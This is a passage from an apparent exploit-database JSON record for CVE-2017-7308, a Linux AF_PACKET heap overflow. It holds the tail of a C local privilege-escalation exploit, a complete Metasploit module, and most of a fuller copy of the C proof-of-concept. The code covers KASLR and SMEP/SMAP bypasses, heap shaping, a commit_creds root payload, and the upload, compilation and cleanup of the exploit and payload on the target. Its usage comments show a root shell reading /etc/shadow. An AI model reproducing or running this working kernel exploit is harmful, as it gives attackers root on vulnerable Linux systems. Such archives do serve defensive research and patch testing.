%s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr_sysmap() {\r\n\tFILE *f;\r\n\tunsigned long addr = 0;\r\n\tchar path[512] = \"/boot/System.map-\";\r\n\tchar version[32];\r\n\tget_kernel_version(&version[0], 32);\r\n\tstrcat(path, &version[0]);\r\n\tdprintf(\"[.] trying %s...\\n\", path);\r\n\tf = fopen(path, \"r\");\r\n\tif (f == NULL) {\r\n\t\tdprintf(\"[-] open/read(%s)\\n\", path);\r\n\t\treturn 0;\r\n\t}\r\n\r\n\tchar dummy;\r\n\tchar sname[256];\r\n\tchar* name = \"startup_64\";\r\n\tint ret = 0;\r\n\twhile (ret != EOF) {\r\n\t\tret = fscanf(f, \"%p %c %s\\n\", (void **)&addr, &dummy, sname);\r\n\t\tif (ret == 0) {\r\n\t\t\tfscanf(f, \"%s\\n\", sname);\r\n\t\t\tcontinue;\r\n\t\t}\r\n\t\tif (!strcmp(name, sname)) {\r\n\t\t\tfclose(f);\r\n\t\t\treturn addr;\r\n\t\t}\r\n\t}\r\n\r\n\tfclose(f);\r\n\tdprintf(\"[-] kernel base not found in %s\\n\", path);\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *\r\n\r\nunsigned long get_kernel_addr() {\r\n\tunsigned long addr = 0;\r\n\r\n\taddr = get_kernel_addr_kallsyms();\r\n if (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_sysmap();\r\n\tif (addr) return addr;\r\n\r\n\taddr = get_kernel_addr_syslog();\r\n\tif (addr) return addr;\r\n\r\n\tdprintf(\"[-] KASLR bypass failed\\n\");\r\n\texit(EXIT_FAILURE);\r\n\r\n\treturn 0;\r\n}\r\n\r\n// * * * * * * * * * * * * * * * * * Main * * * * * * * * * * * * * * * * * *\r\n\r\nvoid check_procs() {\r\n\tint min_procs = 2;\r\n\r\n\tint nprocs = 0;\r\n\tnprocs = get_nprocs_conf();\r\n\r\n\tif (nprocs < min_procs) {\r\n\t\tdprintf(\"[-] system has less than %d processor cores\\n\", min_procs);\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tdprintf(\"[.] system has %d processors\\n\", nprocs);\r\n}\r\n\r\nvoid exec_shell() {\r\n\tint fd;\r\n\r\n\tfd = open(\"/proc/1/ns/net\", O_RDONLY);\r\n\tif (fd == -1) {\r\n\t\tdprintf(\"error opening /proc/1/ns/net\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (setns(fd, CLONE_NEWNET) == -1) {\r\n\t\tdprintf(\"error calling setns\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tsystem(SHELL);\r\n}\r\n\r\nvoid fork_shell() {\r\n\tpid_t rv;\r\n\r\n\trv = fork();\r\n\tif (rv == -1) {\r\n\t\tdprintf(\"[-] fork()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (rv == 0) {\r\n\t\texec_shell();\r\n\t}\r\n}\r\n\r\nbool is_root() {\r\n\t// We can't simple check uid, since we're running inside a namespace\r\n\t// with uid set to 0. Try opening /etc/shadow instead.\r\n\tint fd = open(\"/etc/shadow\", O_RDONLY);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid check_root() {\r\n\tdprintf(\"[.] checking if we got root\\n\");\r\n\r\n\tif (!is_root()) {\r\n\t\tdprintf(\"[-] something went wrong =(\\n\");\r\n\t\treturn;\r\n\t}\r\n\r\n\tdprintf(\"[+] got r00t ^_^\\n\");\r\n\r\n\t// Fork and exec instead of just doing the exec to avoid potential\r\n\t// memory corruptions when closing packet sockets.\r\n\tfork_shell();\r\n}\r\n\r\nbool write_file(const char* file, const char* what, ...) {\r\n\tchar buf[1024];\r\n\tva_list args;\r\n\tva_start(args, what);\r\n\tvsnprintf(buf, sizeof(buf), what, args);\r\n\tva_end(args);\r\n\tbuf[sizeof(buf) - 1] = 0;\r\n\tint len = strlen(buf);\r\n\r\n\tint fd = open(file, O_WRONLY | O_CLOEXEC);\r\n\tif (fd == -1)\r\n\t\treturn false;\r\n\tif (write(fd, buf, len) != len) {\r\n\t\tclose(fd);\r\n\t\treturn false;\r\n\t}\r\n\tclose(fd);\r\n\treturn true;\r\n}\r\n\r\nvoid setup_sandbox() {\r\n\tint real_uid = getuid();\r\n\tint real_gid = getgid();\r\n\r\n if (unshare(CLONE_NEWUSER) != 0) {\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n if (unshare(CLONE_NEWNET) != 0) {\r\n\t\tdprintf(\"[-] unshare(CLONE_NEWUSER)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (!write_file(\"/proc/self/setgroups\", \"deny\")) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/set_groups)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/uid_map\", \"0 %d 1\\n\", real_uid)){\r\n\t\tdprintf(\"[-] write_file(/proc/self/uid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tif (!write_file(\"/proc/self/gid_map\", \"0 %d 1\\n\", real_gid)) {\r\n\t\tdprintf(\"[-] write_file(/proc/self/gid_map)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tcpu_set_t my_set;\r\n\tCPU_ZERO(&my_set);\r\n\tCPU_SET(0, &my_set);\r\n\tif (sched_setaffinity(0, sizeof(my_set), &my_set) != 0) {\r\n\t\tdprintf(\"[-] sched_setaffinity()\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tif (system(\"/sbin/ifconfig lo up\") != 0) {\r\n\t\tdprintf(\"[-] system(/sbin/ifconfig lo up)\\n\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n}\r\n\r\nint main(int argc, char *argv[]) {\r\n\tif (argc > 1) SHELL = argv[1];\r\n\r\n\tdprintf(\"[.] starting\\n\");\r\n\r\n\tcheck_procs();\r\n\r\n\tdprintf(\"[.] checking kernel version\\n\");\r\n\tdetect_versions();\r\n\tdprintf(\"[~] done, version looks good\\n\");\r\n\r\n\tdprintf(\"[.] checking SMEP and SMAP\\n\");\r\n\tcheck_smep_smap();\r\n\tdprintf(\"[~] done, looks good\\n\");\r\n\r\n\tdprintf(\"[.] setting up namespace sandbox\\n\");\r\n\tsetup_sandbox();\r\n\tdprintf(\"[~] done, namespace sandbox set up\\n\");\r\n\r\n#if ENABLE_KASLR_BYPASS\r\n\tdprintf(\"[.] KASLR bypass enabled, getting kernel addr\\n\");\r\n\tKERNEL_BASE = get_kernel_addr();\r\n\tdprintf(\"[.] done, kernel text: %lx\\n\", KERNEL_BASE);\r\n#endif\r\n\r\n\tdprintf(\"[.] commit_creds: %lx\\n\", COMMIT_CREDS);\r\n\tdprintf(\"[.] prepare_kernel_cred: %lx\\n\", PREPARE_KERNEL_CRED);\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tdprintf(\"[.] native_write_cr4: %lx\\n\", NATIVE_WRITE_CR4);\r\n#endif\r\n\r\n\tdprintf(\"[.] padding heap\\n\");\r\n\tkmalloc_pad(KMALLOC_PAD);\r\n\tpagealloc_pad(PAGEALLOC_PAD);\r\n\tdprintf(\"[.] done, heap is padded\\n\");\r\n\r\n#if ENABLE_SMEP_SMAP_BYPASS\r\n\tdprintf(\"[.] SMEP & SMAP bypass enabled, turning them off\\n\");\r\n\toob_timer_execute((void *)(NATIVE_WRITE_CR4), CR4_DESIRED_VALUE);\r\n\tdprintf(\"[.] done, SMEP & SMAP should be off now\\n\");\r\n#endif\r\n\r\n\tdprintf(\"[.] executing get root payload %p\\n\", &get_root_payload);\r\n\toob_id_match_execute((void *)&get_root_payload);\r\n\tdprintf(\"[.] done, should be root now\\n\");\r\n\r\n\tcheck_root();\r\n\r\n\twhile (1) sleep(1000);\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47168"}, {"lastseen": "2018-05-24T14:22:42", "description": "Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit). CVE-2017-7308. Local exploit for Linux platform. Tags: Metasploit Fr...", "published": "2018-05-18T00:00:00", "type": "exploitdb", "title": "Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2018-05-18T00:00:00", "id": "EDB-ID:44654", "href": "https://www.exploit-db.com/exploits/44654/", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GoodRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Post::Linux::Priv\r\n include Msf::Post::Linux::System\r\n include Msf::Post::Linux::Kernel\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'AF_PACKET packet_set_ring Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a heap-out-of-bounds write in the packet_set_ring\r\n function in net/packet/af_packet.c (AF_PACKET) in the Linux kernel\r\n to execute code as root (CVE-2017-7308).\r\n\r\n The bug was initially introduced in 2011 and patched in version 4.10.6,\r\n potentially affecting a large number of kernels; however this exploit\r\n targets only systems using Ubuntu Xenial kernels 4.8.0 < 4.8.0-46,\r\n including Linux distros based on Ubuntu Xenial, such as Linux Mint.\r\n\r\n The target system must have unprivileged user namespaces enabled and\r\n two or more CPU cores.\r\n\r\n Bypasses for SMEP, SMAP and KASLR are included. Failed exploitation\r\n may crash the kernel.\r\n\r\n This module has been tested successfully on Linux Mint 18 (x86_64)\r\n with kernel versions:\r\n\r\n 4.8.0-34-generic;\r\n 4.8.0-36-generic;\r\n 4.8.0-39-generic;\r\n 4.8.0-41-generic;\r\n 4.8.0-42-generic;\r\n 4.8.0-44-generic;\r\n 4.8.0-45-generic.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Andrey Konovalov', # Discovery and C exploit\r\n 'Brendan Coles' # Metasploit\r\n ],\r\n 'DisclosureDate' => 'Mar 29 2017',\r\n 'Platform' => [ 'linux' ],\r\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\r\n 'SessionTypes' => [ 'shell', 'meterpreter' ],\r\n 'Targets' => [[ 'Auto', {} ]],\r\n 'Privileged' => true,\r\n 'References' =>\r\n [\r\n [ 'EDB', '41994' ],\r\n [ 'CVE', '2017-7308' ],\r\n [ 'BID', '97234' ],\r\n [ 'URL', 'https://googleprojectzero.blogspot.com/2017/05/exploiting-linux-kernel-via-packet.html' ],\r\n [ 'URL', 'https://www.coresecurity.com/blog/solving-post-exploitation-issue-cve-2017-7308' ],\r\n [ 'URL', 'https://people.canonical.com/~ubuntu-security/cve/2017/CVE-2017-7308.html', ],\r\n [ 'URL', 'https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-7308/poc.c' ],\r\n [ 'URL', 'https://github.com/bcoles/kernel-exploits/blob/cve-2017-7308/CVE-2017-7308/poc.c' ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n register_options [\r\n OptEnum.new('COMPILE', [ true, 'Compile on target', 'Auto', %w(Auto True False) ]),\r\n OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n write_file path, data\r\n end\r\n\r\n def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data)\r\n upload \"#{path}.c\", data\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n\r\n output = cmd_exec gcc_cmd\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n cmd_exec \"chmod +x #{path}\"\r\n end\r\n\r\n def exploit_data(file)\r\n path = ::File.join Msf::Config.data_directory, 'exploits', 'cve-2017-7308', file\r\n fd = ::File.open path, 'rb'\r\n data = fd.read fd.stat.size\r\n fd.close\r\n data\r\n end\r\n\r\n def live_compile?\r\n return false unless datastore['COMPILE'].eql?('Auto') || datastore['COMPILE'].eql?('True')\r\n\r\n if has_gcc?\r\n vprint_good 'gcc is installed'\r\n return true\r\n end\r\n\r\n unless datastore['COMPILE'].eql? 'Auto'\r\n fail_with Failure::BadConfig, 'gcc is not installed. Compiling will fail.'\r\n end\r\n end\r\n\r\n def check\r\n version = kernel_release\r\n unless version =~ /^4\\.8\\.0-(34|36|39|41|42|44|45)-generic/\r\n vprint_error \"Linux kernel version #{version} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"Linux kernel version #{version} is vulnerable\"\r\n\r\n arch = kernel_hardware\r\n unless arch.include? 'x86_64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n cores = get_cpu_info[:cores].to_i\r\n min_required_cores = 2\r\n unless cores >= min_required_cores\r\n vprint_error \"System has less than #{min_required_cores} CPU cores\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System has #{cores} CPU cores\"\r\n\r\n unless userns_enabled?\r\n vprint_error 'Unprivileged user namespaces are not permitted'\r\n return CheckCode::Safe\r\n end\r\n vprint_good 'Unprivileged user namespaces are permitted'\r\n\r\n if kptr_restrict? && dmesg_restrict?\r\n vprint_error 'Both kernel.kptr_restrict and kernel.dmesg_destrict are enabled. KASLR bypass will fail.'\r\n return CheckCode::Safe\r\n end\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n if check != CheckCode::Appears\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable'\r\n end\r\n\r\n if is_root?\r\n fail_with Failure::BadConfig, 'Session already has root privileges'\r\n end\r\n\r\n unless cmd_exec(\"test -w '#{base_dir}' && echo true\").include? 'true'\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload exploit executable\r\n executable_name = \".#{rand_text_alphanumeric rand(5..10)}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n if live_compile?\r\n vprint_status 'Live compiling exploit on system...'\r\n upload_and_compile executable_path, exploit_data('poc.c')\r\n rm_f \"#{executable_path}.c\"\r\n else\r\n vprint_status 'Dropping pre-compiled exploit on system...'\r\n upload_and_chmodx executable_path, exploit_data('exploit')\r\n end\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric rand(5..10)}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec \"#{executable_path} #{payload_path}\"\r\n output.each_line { |line| vprint_status line.chomp }\r\n print_status 'Deleting executable...'\r\n rm_f executable_path\r\n Rex.sleep 5\r\n print_status 'Deleting payload...'\r\n rm_f payload_path\r\n end\r\nend", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/44654/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:29", "description": "\nLinux Kernel 4.8.0-34 4.8.0-45 (Ubuntu Linux Mint) - Packet Socket Local Privilege Escalation", "edition": 1, "published": "2018-12-29T00:00:00", "title": "Linux Kernel 4.8.0-34 4.8.0-45 (Ubuntu Linux Mint) - Packet Socket Local Privilege Escalation", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7308"], "modified": "2018-12-29T00:00:00", "id": "EXPLOITPACK:66230DDA8228F7537211A7F78C05A763", "href": "", "sourceData": "// A proof-of-concept local root exploit for CVE-2017-7308.\n// Includes a SMEP & SMAP bypass.\n// Tested on Ubuntu / Linux Mint:\n// - 4.8.0-34-generic\n// - 4.8.0-36-generic\n// - 4.8.0-39-generic\n// - 4.8.0-41-generic\n// - 4.8.0-42-generic\n// - 4.8.0-44-generic\n// - 4.8.0-45-generic\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2017-7308\n//\n// Usage:\n// user@ubuntu:~$ uname -a\n// Linux ubuntu 4.8.0-41-generic #44~16.04.1-Ubuntu SMP Fri Mar 3 ...\n// user@ubuntu:~$ gcc pwn.c -o pwn\n// user@ubuntu:~$ ./pwn \n// [.] starting\n// [.] system has 2 processors\n// [.] checking kernel version\n// [.] kernel version '4.8.0-41-generic' detected\n// [~] done, version looks good\n// [.] checking SMEP and SMAP\n// [~] done, looks good\n// [.] setting up namespace sandbox\n// [~] done, namespace sandbox set up\n// [.] KASLR bypass enabled, getting kernel addr\n// [.] done, kernel text: ffffffff87000000\n// [.] commit_creds: ffffffff870a5cf0\n// [.] prepare_kernel_cred: ffffffff870a60e0\n// [.] native_write_cr4: ffffffff87064210\n// [.] padding heap\n// [.] done, heap is padded\n// [.] SMEP & SMAP bypass enabled, turning them off\n// [.] done, SMEP & SMAP should be off now\n// [.] executing get root payload 0x401516\n// [.] done, should be root now\n// [.] checking if we got root\n// [+] got r00t ^_^\n// root@ubuntu:/home/user# cat /etc/shadow\n// root:!:17246:0:99999:7:::\n// daemon:*:17212:0:99999:7:::\n// bin:*:17212:0:99999:7:::\n// ...\n//\n// Andrey Konovalov <andreyknvl@gmail.com>\n// ---\n// Updated by <bcoles@gmail.com>\n// - support for systems with SMEP but no SMAP\n// - check number of CPU cores\n// - additional kernel targets\n// - additional KASLR bypasses\n// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2017-7308\n\n#define _GNU_SOURCE\n\n#include <assert.h>\n#include <fcntl.h>\n#include <stdarg.h>\n#include <stdbool.h>\n#include <stddef.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <sched.h>\n\n#include <sys/ioctl.h>\n#include <sys/klog.h>\n#include <sys/mman.h>\n#include <sys/socket.h>\n#include <sys/syscall.h>\n#include <sys/sysinfo.h>\n#include <sys/types.h>\n#include <sys/utsname.h>\n#include <sys/wait.h>\n\n#include <arpa/inet.h>\n#include <linux/if_packet.h>\n#include <linux/ip.h>\n#include <linux/udp.h>\n#include <netinet/if_ether.h>\n#include <net/if.h>\n\n#define DEBUG\n\n#ifdef DEBUG\n# define dprintf printf\n#else\n# define dprintf\n#endif\n\n#define ENABLE_KASLR_BYPASS\t\t1\n#define ENABLE_SMEP_SMAP_BYPASS\t\t1\n\nchar *SHELL = \"/bin/bash\";\n\n// Will be overwritten if ENABLE_KASLR_BYPASS\nunsigned long KERNEL_BASE = \t\t0xffffffff81000000ul;\n\n// Will be overwritten by detect_versions().\nint kernel = -1;\n\nstruct kernel_info {\n\tconst char* version;\n\tuint64_t commit_creds;\n\tuint64_t prepare_kernel_cred;\n\tuint64_t native_write_cr4;\n};\n\nstruct kernel_info kernels[] = {\n\t{ \"4.8.0-34-generic\", 0xa5d50, 0xa6140, 0x64210 },\n\t{ \"4.8.0-36-generic\", 0xa5d50, 0xa6140, 0x64210 },\n\t{ \"4.8.0-39-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\n\t{ \"4.8.0-41-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\n\t{ \"4.8.0-42-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\n\t{ \"4.8.0-44-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\n\t{ \"4.8.0-45-generic\", 0xa5cf0, 0xa60e0, 0x64210 },\n};\n\n// Used to get root privileges.\n#define COMMIT_CREDS\t\t\t(KERNEL_BASE + kernels[kernel].commit_creds)\n#define PREPARE_KERNEL_CRED\t\t(KERNEL_BASE + kernels[kernel].prepare_kernel_cred)\n#define NATIVE_WRITE_CR4\t\t(KERNEL_BASE + kernels[kernel].native_write_cr4)\n\n// Will be overwritten if ENABLE_SMEP_SMAP_BYPASS\nunsigned long CR4_DESIRED_VALUE =\t0x406e0ul;\n\n#define KMALLOC_PAD\t\t\t512\n#define PAGEALLOC_PAD\t\t\t1024\n\n// * * * * * * * * * * * * * * Kernel structs * * * * * * * * * * * * * * * *\n\ntypedef uint32_t u32;\n\n// $ pahole -C hlist_node ./vmlinux\nstruct hlist_node {\n\tstruct hlist_node * next; /* 0 8 */\n\tstruct hlist_node * * pprev; /* 8 8 */\n};\n\n// $ pahole -C timer_list ./vmlinux\nstruct timer_list {\n\tstruct hlist_node entry; /* 0 16 */\n\tlong unsigned int expires; /* 16 8 */\n\tvoid (*function)(long unsigned int); /* 24 8 */\n\tlong unsigned int data; /* 32 8 */\n\tu32 flags; /* 40 4 */\n\tint start_pid; /* 44 4 */\n\tvoid * start_site; /* 48 8 */\n\tchar start_comm[16]; /* 56 16 */\n};\n\n// packet_sock->rx_ring->prb_bdqc->retire_blk_timer\n#define TIMER_OFFSET\t896\n\n// pakcet_sock->xmit\n#define XMIT_OFFSET\t1304\n\n// * * * * * * * * * * * * * * * Helpers * * * * * * * * * * * * * * * * * *\n\nvoid packet_socket_rx_ring_init(int s, unsigned int block_size,\n\t\tunsigned int frame_size, unsigned int block_nr,\n\t\tunsigned int sizeof_priv, unsigned int timeout) {\n\tint v = TPACKET_V3;\n\tint rv = setsockopt(s, SOL_PACKET, PACKET_VERSION, &v, sizeof(v));\n\tif (rv < 0) {\n\t\tdprintf(\"[-] setsockopt(PACKET_VERSION)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tstruct tpacket_req3 req;\n\tmemset(&req, 0, sizeof(req));\n\treq.tp_block_size = block_size;\n\treq.tp_frame_size = frame_size;\n\treq.tp_block_nr = block_nr;\n\treq.tp_frame_nr = (block_size * block_nr) / frame_size;\n\treq.tp_retire_blk_tov = timeout;\n\treq.tp_sizeof_priv = sizeof_priv;\n\treq.tp_feature_req_word = 0;\n\n\trv = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req));\n\tif (rv < 0) {\n\t\tdprintf(\"[-] setsockopt(PACKET_RX_RING)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nint packet_socket_setup(unsigned int block_size, unsigned int frame_size,\n\t\tunsigned int block_nr, unsigned int sizeof_priv, int timeout) {\n\tint s = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));\n\tif (s < 0) {\n\t\tdprintf(\"[-] socket(AF_PACKET)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpacket_socket_rx_ring_init(s, block_size, frame_size, block_nr,\n\t\tsizeof_priv, timeout);\n\n\tstruct sockaddr_ll sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sll_family = PF_PACKET;\n\tsa.sll_protocol = htons(ETH_P_ALL);\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\n\tsa.sll_hatype = 0;\n\tsa.sll_pkttype = 0;\n\tsa.sll_halen = 0;\n\n\tint rv = bind(s, (struct sockaddr *)&sa, sizeof(sa));\n\tif (rv < 0) {\n\t\tdprintf(\"[-] bind(AF_PACKET)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\treturn s;\n}\n\nvoid packet_socket_send(int s, char *buffer, int size) {\n\tstruct sockaddr_ll sa;\n\tmemset(&sa, 0, sizeof(sa));\n\tsa.sll_ifindex = if_nametoindex(\"lo\");\n\tsa.sll_halen = ETH_ALEN;\n\n\tif (sendto(s, buffer, size, 0, (struct sockaddr *)&sa,\n\t\t\tsizeof(sa)) < 0) {\n\t\tdprintf(\"[-] sendto(SOCK_RAW)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n}\n\nvoid loopback_send(char *buffer, int size) {\n\tint s = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);\n\tif (s == -1) {\n\t\tdprintf(\"[-] socket(SOCK_RAW)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\n\tpacket_socket_send(s, buffer, size);\n}\n\nint packet_sock_kmalloc() {\n\tint s = socket(AF_PACKET, SOCK_DGRAM, htons(ETH_P_ARP));\n\tif (s == -1) {\n\t\tdprintf(\"[-] socket(SOCK_DGRAM)\\n\");\n\t\texit(EXIT_FAILURE);\n\t}\n\treturn s;\n}\n\nvoid packet_sock_timer_schedule(int s, int timeout) {\n\tpacket_socket_rx_ring_init(s, 0x1000, 0x1000, 1, 0, timeout);\n}\n\nvoid packet_sock_id_match_trigger(int s) {\n\tchar buffer[16];\n\tpacket_socket_send(s, &buffer[0], sizeof(buffer));\n}\n\n// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *\n\n#define ALIGN(x, a)\t\t\t__ALIGN_KERNEL((x), (a))\n#define __ALIGN_KERNEL(x, a)\t\t__ALIGN_KERNEL_MASK(x, (typeof(x))(a) - 1)\n#define __ALIGN_KERNEL_MASK(x, mask)\t(((x) + (mask)) & ~(mask))\n\n#define V3_ALIGNMENT\t(8)\n#define BLK_HDR_LEN\t(ALIGN(sizeof(struct tpacket_block_desc), V3_ALIGNMENT))\n\n#define ETH_HDR_LEN\tsizeof(struct ethhdr)\n#define IP_HDR_LEN\tsizeof(struct iphdr)\n#define UDP_HDR_LEN\tsizeof(struct udphdr)\n\n#define UDP_HDR_LEN_FULL\t(ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN)\n\nint oob_setup(int offset) {\n\tunsigned int maclen = ETH_HDR_LEN;\n\tunsigned int netoff = TPACKET_ALIGN(TPACKET3_HDRLEN +\n\t\t\t\t(maclen < 16 ? 16 : maclen));\n\tunsigned int macoff = netoff - maclen;\n\tunsigned int sizeof_priv = (1u<<31) + (1u<<30) +\n\t\t0x8000 - BLK_HDR_LEN - macoff + offset;\n\treturn packet_socket_setup(0x8000, 2048, 2, sizeof_priv, 100);\n}\n\nvoid oob_write(char *buffer, int size) {\n\tloopback_send(buffer, size);\n}\n\nvoid oob_timer_execute(void *func, unsigned long arg) {\n\toob_setup(2048 + TIMER_OFFSET - 8);\n\n\tint i;\n\tfor (i = 0; i < 32; i++) {\n\t\tint timer = packet_sock_kmalloc();\n\t\tpacket_sock_timer_schedule(timer, 1000);\n\t}\n\n\tchar buffer[2048];\n\tmemset(&buffer[0], 0, sizeof(buffer));\n\n\tstruct timer_list *timer = (struct timer_list *)&buffer[8];\n\ttimer->function = func;\n\ttimer->data = arg;\n\ttimer->flags = 1;\n\n\toob_write(&buffer[0] + 2, sizeof(*timer) + 8 - 2);\n\n\tsleep(1);\n}\n\nvoid oob_id_match_execute(void *func) {\n\tint s = oob_setup(2048 + XMIT_OFFSET - 64);\n\n\tint ps[32];\n\n\tint i;\n\tfor (i = 0; i < 32; i++)\n\t\tps[i] = packet_sock_kmalloc();\n\n\tchar buffer[2048];\n\tmemset(&buffer[0], 0, 2048);\n\n\tvoid **xmit = (void **)&buffer[64];\n\t*xmit = func;\n\n\toob_write((char *)&buffer[0] + 2, sizeof(*xmit) + 64 - 2);\n\n\tfor (i = 0; i < 32; i++)\n\t\tpacket_sock_id_match_trigger(ps[i]);\n}\n\n// * * * * * * * * * * * * * * Heap shaping * * * * * * * * * * * * * * * * *\n\nvoid kmalloc_pad(int count) {\n\tint i;\n\tfor (i = 0; i < count; i++)\n\t\tpacket_sock_kmalloc();\n}\n\nvoid pagealloc_pad(int count) {\n\tpacket_socket_setup(0x8000, 2048, count, 0, 100);\n}\n\n// * * * * * * * * * * * * * * * Getting root * * * * * * * * * * * * * * * *\n\ntypedef unsigned long __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\n\nvoid get_root_payload(void) {\n\t((_commit_creds)(COMMIT_CREDS))(\n\t\t((_prepare_kernel_cred)(PREPARE_KERNEL_CRED))(0)\n\t);\n}\n\n// * * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * * *\n\n#define CHUNK_SIZE 1024\n\nint read_file(const char* file, char* buffer, int max_length) {\n\tint f = open(file, O_RDONLY);\n\tif (f == -1)\n\t\treturn -1;\n\tint bytes_read = 0;\n\twhile (true) {\n\t\tint bytes_to_read = CHUNK_SIZE;\n\t\tif (bytes_to_read > max_length - bytes_read)\n\t\t\tbytes_to_read = max_length - bytes_read;\n\t\tint rv = read(f, &buffer[bytes_read], bytes_to_read);\n\t\tif (rv == -1)\n\t\t\treturn -1;\n\t\tbytes_read += rv;\n\t\tif (rv == 0)\n\t\t\treturn bytes_read;\n\t}\n}\n\nvoid get_kernel_version(char* output, int max_length) {\n struct utsname u;\n int rv = uname(&u);\n if (rv != 